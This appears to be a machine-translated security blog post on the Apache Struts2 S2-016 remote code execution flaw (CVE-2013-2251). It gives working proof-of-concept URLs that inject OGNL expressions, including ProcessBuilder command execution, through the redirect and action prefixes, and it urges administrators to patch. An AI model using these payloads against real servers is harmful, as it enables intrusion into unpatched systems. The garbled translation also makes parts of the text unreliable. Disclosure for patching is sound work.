Struts2 Remote Code Execution (S2-016) exploitation tool

7. 17 noon just woke up and saw several familiar words-Struts2, remotely executing code. Shi Te! Is there another new one after the last tag? I was not awake yet. After looking at the result, a cloud screen was refreshed ~~~ A picture of the storm is coming soon...

It is reported that the affected version is 2.0.0-2.3.15, CVE number: CVE-2013-2251. The reason is that redirect and redirectAction parameters are not properly filtered, which allows attackers to remotely execute OGNL expressions when accessing Struts2 applications.

Proof of vulnerability:

Http: // host/struts2-blank/example/X. action? Action: % 25 {3*4}

Http: // host/struts2-blank/example/X. action? Redirect: % 25 {3*4}

Http: // host/struts2-blank/example/X. action? RedirectAction: % 25 {3*4}

Code test:

Http: // host/struts2-blank/example/X. action? Action: % 25 {(new + java. lang. processBuilder (new + java. lang. string [] {'command', 'goes', 'where '})). start ()}

Http: // host/struts2-showcase/employee/save. action? Redirect: % 25 {(new + java. lang. processBuilder (new + java. lang. string [] {'command', 'goes', 'where '})). start ()}

Http: // host/struts2-showcase/employee/save. action? RedirectAction: % 25 {(new + java. lang. processBuilder (new + java. lang. string [] {'command', 'goes', 'where '})). start ()}

The official website has updated the patch, and administrators can speed up the patch. Otherwise, the pants will not be removed yet.

URL: http://struts.apache.org/download.cgi#struts23151

The following shows the usage tool written in python [Figure]

I was almost scared when I used GOOGLE to search for it. I strongly recommend that you fix it when you work overtime tonight !!!

Apache Struts remote command execution vulnerability with multiple prefix parameters (CVE-2013-2251)

Apache Struts multiple open redirection vulnerabilities (CVE-2013-2248)

Struts2 Remote Code Execution Vulnerability (S2-016)